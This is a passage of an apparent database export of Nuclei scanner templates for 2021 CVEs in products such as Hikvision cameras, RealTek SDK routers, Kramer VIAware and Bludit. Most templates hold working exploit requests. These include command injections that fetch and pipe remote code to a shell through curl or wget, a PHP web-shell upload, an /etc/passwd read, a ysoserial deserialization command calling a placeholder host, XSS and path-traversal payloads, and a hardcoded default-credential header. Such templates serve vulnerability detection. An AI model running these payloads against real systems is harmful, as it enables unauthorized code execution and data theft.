2\n vendor: maxsite\n product: maxsite_cms\n shodan-query: html:'content=\"MaxSite CMS'\n tags: cve2021,cve,maxsite,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E'\n - '{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '>'\n\n - type: word\n part: body\n words:\n - 'mso-comments-rss\">RSS'\n - 'MaxSite CMS'\n - 'feed\">RSS'\n condition: or\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e9c214b01c6e7d86492788140807064441cd148338038cbab30021c0d8492ef202202fee55bfa22008c45b8096aedbcbb99a19021b8b9794c77311b87645ff04cca1:922c64590222798bb761d5b6d8e72950", "hash": "bf7e9f6c49ce79a0e2795a74e4e643ef", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308376" }, "name": "CVE-2021-35323.yaml", "content": "id: CVE-2021-35323\n\ninfo:\n name: Bludit 3.13.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A cross-site scripting (XSS) vulnerability exists in Bludit 3.13.1 via the username field submitted to admin/login. The requests below target /bludit/admin/login, so the template assumes Bludit is installed under /bludit/; adjust the path for other install locations.\n remediation: Upgrade to Bludit v4.0.0.\n reference:\n - https://github.com/bludit/bludit/issues/1327\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35323\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-35323\n cwe-id: CWE-79\n epss-score: 0.00183\n epss-percentile: 0.55601\n cpe: cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: bludit\n product: bludit\n shodan-query: title:\"Bludit\"\n tags: cve2021,cve,bludit,xss\n\nhttp:\n - raw:\n - |\n GET /bludit/admin/login HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 10s\n POST /bludit/admin/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
tokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=\n\n host-redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"\") && contains(body_2, \"Bludit\")'\n condition: and\n\n extractors:\n - type: regex\n name: tokenCSRF\n part: body\n group: 1\n regex:\n - 'type=\"hidden\" id=\"jstokenCSRF\" name=\"tokenCSRF\" value=\"(.*)\"'\n internal: true\n# digest: 4a0a00473045022032cea10cfe2c27c8f06a3a4d1af7a5f3386caf73473c6483fd0df3b4bea40945022100919da458a0416cd6205d3f542c2f118ce6764e45d01de619621fb1db132866e6:922c64590222798bb761d5b6d8e72950", "hash": "c9da3bfd648d3b8d48fe94ced64d19aa", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308377" }, "name": "CVE-2021-35336.yaml", "content": "id: CVE-2021-35336\n\ninfo:\n name: Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access\n author: Pratik Khalane\n severity: critical\n description: Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.\n impact: |\n An attacker can gain unauthorized access to the admin panel, potentially leading to unauthorized control and manipulation of the audio gateway.\n remediation: |\n Upgrade to a patched version of Tieline IP Audio Gateway that fixes the vulnerability.\n reference:\n - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35336\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-35336\n cwe-id: CWE-1188\n epss-score: 
0.0793\n epss-percentile: 0.94105\n cpe: cpe:2.3:o:tieline:ip_audtio_gateway_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tieline\n product: ip_audtio_gateway_firmware\n tags: cve2021,cve,tieline,default-login\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/api/get_device_details'\n\n headers:\n Authorization: 'Digest username=\"admin\", realm=\"Bridge-IT\", nonce=\"d24d09512ebc3e43c4f6faf34fdb8c76\", uri=\"/api/get_device_details\", response=\"d052e9299debc7bd9cb8adef0a83fed4\", qop=auth, nc=00000001, cnonce=\"ae373d748855243d\"'\n Referer: '{{BaseURL}}/assets/base/home.html'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n - \"\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/xml\"\n\n - type: status\n status:\n - 200\n\n# admin:password\n# digest: 4a0a00473045022100c5971cc683938cd5ccc1d2b6f56c1c2e6b4be1423d7d682586326e7ced627fb002201cbaba9a7838eab21d7dae0dbe8582f084e0fad966c90ec30731787e015a7abd:922c64590222798bb761d5b6d8e72950", "hash": "1e78884fabb9c861c90fe4169e7fe2fd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308378" }, "name": "CVE-2021-35380.yaml", "content": "id: CVE-2021-35380\n\ninfo:\n name: TermTalk Server 3.24.0.2 - Local File Inclusion\n author: fxploit\n severity: high\n description: |\n TermTalk Server (TTServer) 3.24.0.2 is vulnerable to a directory-traversal style local file inclusion in the valore parameter of the /file endpoint, which allows an unauthenticated malicious user to read files on the remote system by supplying a relative path (for example ../../../../../windows/win.ini) to the file they want to retrieve.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.\n remediation: |\n Apply the latest patch or upgrade to a non-vulnerable version of TermTalk Server.\n reference:\n - https://www.swascan.com/solari-di-udine/\n - https://www.exploit-db.com/exploits/50638\n - 
https://nvd.nist.gov/vuln/detail/CVE-2021-35380\n - https://www.swascan.com/it/security-blog/\n - https://github.com/anonymous364872/Rapier_Tool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-35380\n cwe-id: CWE-22\n epss-score: 0.23467\n epss-percentile: 0.96147\n cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: solari\n product: termtalk_server\n tags: cve2021,cve,termtalk,lfi,unauth,lfr,edb,solari\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/file?valore=../../../../../windows/win.ini\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 490a0046304402201049687d7055f539322e4410a7114608b1866683ac30c589fc9f8b1207b39bac022031fcf5d29996d0c09d94724b89f5f871ca1112d0c801d367951c80f2f395de11:922c64590222798bb761d5b6d8e72950", "hash": "c5d9e507c3f9390d990ca2ee74dfcc90", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308379" }, "name": "CVE-2021-35395.yaml", "content": "id: CVE-2021-35395\n\ninfo:\n name: RealTek Jungle SDK - Arbitrary Command Injection\n author: king-alexander\n severity: critical\n description: |\n There is a command injection vulnerability on the \"formWsc\" page of the management interface. 
Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.\n remediation: Apply the latest security patches or updates provided by RealTek to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35395\n - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities\n - https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en\n - https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-35395\n epss-score: 0.97119\n epss-percentile: 0.99744\n cpe: cpe:2.3:a:realtek:realtek_jungle_sdk:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: realtek\n product: realtek_jungle_sdk\n tags: cve2021,cve,realtek,rce,kev\n\nhttp:\n - raw:\n - |\n POST /goform/formWsc HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4a0a0047304502200f282350954f899ddbf62874c49a1c8297dfe332dae61b46c09d5fce43904bf4022100861f33e914b3543cccbec18fe3c283f7a6a028d5f52c9691c9f397c000c41ddd:922c64590222798bb761d5b6d8e72950", "hash": "72517733aeb9a0235c4477e14d27a703", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30837a" }, "name": "CVE-2021-35464.yaml", "content": "id: CVE-2021-35464\n\ninfo:\n name: ForgeRock OpenAM <7.0 - Remote Code Execution\n author: madrobot\n severity: critical\n description: |\n ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple 
pages.\n The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted\n /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO)\n found in versions of Java 8 or earlier.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade ForgeRock OpenAM to version 7.0 or later to mitigate this vulnerability.\n reference:\n - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464\n - http://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.html\n - http://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.html\n - https://bugster.forgerock.org\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-35464\n cwe-id: CWE-502\n epss-score: 0.97262\n epss-percentile: 0.99826\n cpe: cpe:2.3:a:forgerock:am:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: forgerock\n product: am\n shodan-query: http.title:\"OpenAM\"\n tags: cve,cve2021,packetstorm,openam,rce,java,kev,forgerock\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/openam/oauth2/..;/ccversion/Version'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Set-Cookie: JSESSIONID=\"\n\n - type: word\n part: body\n words:\n - \"Version Information -\"\n - \"openam/ccversion/Masthead.jsp\"\n condition: or\n\n - type: status\n status:\n - 200\n\n# {{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession=\n# java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 \"curl http://YOUR_HOST\" | (echo -ne \\\\x00 && cat) | base64 | tr '/+' '_-' | tr -d '='\n# digest: 
4b0a0048304602210096ad692f00dcbf4f3af20af5a64849212f0d34f86c39fc4fb44827b84f7c71e1022100c49ca89081587287319c33037d60f573edf039decc7db504ba8c4f8be2da69e0:922c64590222798bb761d5b6d8e72950", "hash": "f2aa91cec25fdb7e674823d715cc380e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30837b" }, "name": "CVE-2021-35488.yaml", "content": "id: CVE-2021-35488\n\ninfo:\n name: Thruk 2.40-2 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Thruk 2.40-2 contains a reflected cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE} in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi; the payload executes when the crafted link is opened by an authenticated user.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Thruk or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://www.gruppotim.it/redteam\n - https://www.thruk.org/changelog.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35488\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-35488\n cwe-id: CWE-79\n epss-score: 0.00145\n epss-percentile: 0.49429\n cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thruk\n product: thruk\n shodan-query: http.html:\"Thruk\"\n tags: cve2021,cve,thruk,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n 
matchers-condition: and\n matchers:\n - type: word\n words:\n - \"'>\"\n - \"Thruk Monitoring\"\n condition: and\n\n - type: status\n status:\n - 401\n# digest: 4a0a00473045022055819e8cdb5dcdc004233f8a173514f660c7708e98c66aa9920871ec2ca70969022100a7fabd08928656f2dce44bc87916e1e6d23fbe29309f0dff542373be9cf5b065:922c64590222798bb761d5b6d8e72950", "hash": "b6720e3c0421f9ebc080db0efc8b1ab0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30837c" }, "name": "CVE-2021-35587.yaml", "content": "id: CVE-2021-35587\n\ninfo:\n name: Oracle Access Manager - Remote Code Execution\n author: cckuailong\n severity: critical\n description: |\n The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by Oracle to mitigate this vulnerability.\n reference:\n - https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35587\n - https://www.oracle.com/security-alerts/cpujan2022.html\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-35587\n cwe-id: CWE-502\n epss-score: 0.95643\n epss-percentile: 0.99283\n cpe: cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: oracle\n product: access_manager\n shodan-query: http.title:\"Oracle Access 
Management\"\n fofa-query: body=\"/oam/pages/css/login_page.css\"\n tags: cve2021,cve,oam,rce,java,unauth,oracle,kev\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/oam/server/opensso/sessionservice'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"x-oracle-dms-ecid\"\n - \"x-oracle-dms-rid\"\n case-insensitive: true\n condition: or\n\n - type: word\n part: body\n words:\n - \"/oam/pages/css/general.css\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203fa7de8fecbc2facc8c0a655b8b2cc61275326363d9fff38647fca243359d02f02202382cce3edd69ce78ac95cf891de98a149c0998b0d05ba805cd0fab8e0113e48:922c64590222798bb761d5b6d8e72950", "hash": "92726b48da5fbdec1f65bdbeef356dd6", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30837d" }, "name": "CVE-2021-3577.yaml", "content": "id: CVE-2021-3577\n\ninfo:\n name: Motorola Baby Monitors - Remote Command Execution\n author: gy741\n severity: high\n description: Motorola Baby Monitors contain multiple web interface vulnerabilities that could allow an unauthenticated attacker on an adjacent network (CVSS AV:A) to perform command injection attacks against an affected device.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device, potentially leading to unauthorized access, data theft, or further compromise of the network.\n remediation: |\n Apply the latest firmware update provided by Motorola to mitigate the vulnerability and ensure the device is not accessible from untrusted networks.\n reference:\n - https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577\n - https://binatoneglobal.com/security-advisory/\n classification:\n cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-3577\n cwe-id: CWE-863,CWE-78\n epss-score: 0.96689\n epss-percentile: 0.99568\n cpe: 
cpe:2.3:o:binatoneglobal:halo\\+_camera_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: binatoneglobal\n product: halo\\+_camera_firmware\n tags: cve2021,cve,rce,oast,motorola,iot,binatoneglobal\n\nhttp:\n - raw:\n - |\n GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n words:\n - \"set_city_timezone\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100aa647d7278be70f7ef65a356025ae3d22e20cc5aebb94c19af995eda0891d7270220009f787b78b8aba27783ce6d989d860f42d0dc1c269988692807dfe6fffaba3e:922c64590222798bb761d5b6d8e72950", "hash": "5fe1145e36e4fac0a5c5acebba1a5058", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30837e" }, "name": "CVE-2021-36260.yaml", "content": "id: CVE-2021-36260\n\ninfo:\n name: Hikvision IP camera/NVR - Remote Command Execution\n author: pdteam,gy741,johnk3r\n severity: critical\n description: Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. 
An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device.\n remediation: |\n Apply the latest firmware update provided by Hikvision to mitigate this vulnerability.\n reference:\n - https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html\n - https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36260\n - https://github.com/Aiminsun/CVE-2021-36260\n - https://therecord.media/experts-warn-of-widespread-exploitation-involving-hikvision-cameras/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-36260\n cwe-id: CWE-78\n epss-score: 0.97484\n epss-percentile: 0.99965\n cpe: cpe:2.3:o:hikvision:ds-2cd2026g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hikvision\n product: ds-2cd2026g2-iu\\/sl_firmware\n shodan-query: http.favicon.hash:999357577\n tags: cve2021,cve,hikvision,rce,iot,intrusive,kev\n\nhttp:\n - raw:\n - |\n PUT /SDK/webLanguage HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n $(cat /etc/passwd>webLib/x)\n - |\n GET /x HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a0047304502201b310c74c0ecade6660855e689efe3fa564362a2328cdf4ee738863363e0b7c7022100b519bac287cc3e8a6a3cd1187daf969b5f5baf0a2ec9be7adb3344e95561dfc2:922c64590222798bb761d5b6d8e72950", "hash": "af46113b57790c468517b9e81872cf91", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30837f" }, "name": "CVE-2021-36356.yaml", "content": "id: CVE-2021-36356\n\ninfo:\n name: 
Kramer VIAware - Remote Code Execution\n author: gy741\n severity: critical\n description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.\n remediation: |\n Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface.\n reference:\n - https://www.exploit-db.com/exploits/50856\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36356\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35064\n - https://write-up.github.io/kramerav/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-36356\n cwe-id: CWE-434\n epss-score: 0.90558\n epss-percentile: 0.98752\n cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: kramerav\n product: viaware\n tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav\nvariables:\n useragent: \"{{rand_base(6)}}\"\n\nhttp:\n - raw:\n - |\n POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n - |\n GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'\")}' HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - http\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 
490a0046304402207d315039be7b2374857658abe5c9080339493506959d103b741bd2b02930cb020220187d49b26985f25c39c9ba0317f1b0bf0540895f0ee8e3b35b33f10f2b8e4c86:922c64590222798bb761d5b6d8e72950", "hash": "b7e4ecc4985dfe3eba785cf71c1eae1a", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308380" }, "name": "CVE-2021-36380.yaml", "content": "id: CVE-2021-36380\n\ninfo:\n name: Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection\n author: gy741\n severity: critical\n description: Sunhillo SureLine <8.7.0.1.1 is vulnerable to OS command injection. The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The original advisory demonstrates this with a single unauthenticated POST request that injects a command opening a reverse TCP connection to an attacker-controlled host, yielding an interactive remote shell; this template instead injects a wget to an interactsh callback URL through the dnsAddr parameter, so an inbound callback confirms command execution without leaving a shell behind.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Upgrade to Sunhillo SureLine version 8.7.0.1.1 or later to mitigate this vulnerability.\n reference:\n - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36380\n - https://www.sunhillo.com/product/sureline/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-36380\n cwe-id: CWE-78\n epss-score: 0.97166\n epss-percentile: 0.99767\n cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sunhillo\n product: sureline\n tags: cve2021,cve,sureline,rce,oast,sunhillo\n\nhttp:\n - raw:\n - |\n POST /cgi/networkDiag.cgi HTTP/1.1\n Host: {{Hostname}}\n\n 
command=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a00473045022100cb869fc390807661722089db3f26b28a3794a43b3cca905e55d84e61c0a69225022067c488943ca79fef10f100fa0e96c1d2ce819ff67af0b598c2d92ca30be6b3c2:922c64590222798bb761d5b6d8e72950", "hash": "11ae670a573fc1994e2ae75924b399f0", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308381" }, "name": "CVE-2021-36450.yaml", "content": "id: CVE-2021-36450\n\ninfo:\n name: Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting\n author: atomiczsec\n severity: medium\n description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of Verint Workforce Optimization.\n reference:\n - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740\n - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html\n - http://verint.com\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36450\n - https://medium.com/%401nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-36450\n cwe-id: CWE-79\n epss-score: 0.00229\n epss-percentile: 0.61111\n cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: verint\n product: workforce_optimization\n shodan-query: title:\"Verint 
Sign-in\"\n tags: cve2021,cve,xss,verint\n\nhttp:\n - raw:\n - |\n GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">

    Test

    26\" class=\"loginUserNameText'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: csrfp_login\n group: 1\n regex:\n - 'csrfp_login=([a-zA-Z0-9]+);'\n internal: true\n part: header\n# digest: 490a0046304402204bbeed6302fbd74c4981446c4aec420dbd5e6b911f5f7a14f3e8b4d768c306fb02203c509944c3d418204a9b643c3a66e02ed59a5d53806b11c6c38444b56c217f79:922c64590222798bb761d5b6d8e72950", "hash": "f1e221c4efa572bd72a2594ab9e6e042", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308382" }, "name": "CVE-2021-3654.yaml", "content": "id: CVE-2021-3654\n\ninfo:\n name: Nova noVNC - Open Redirect\n author: geeknik\n severity: medium\n description: Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the open redirect vulnerability in the Nova noVNC application.\n reference:\n - https://seclists.org/oss-sec/2021/q3/188\n - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654\n - https://bugs.python.org/issue32084\n - https://opendev.org/openstack/nova/commit/04d48527b62a35d912f93bc75613a6cca606df66\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3654\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-3654\n cwe-id: CWE-601\n epss-score: 0.92596\n epss-percentile: 0.98944\n cpe: cpe:2.3:a:openstack:nova:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: openstack\n product: nova\n tags: 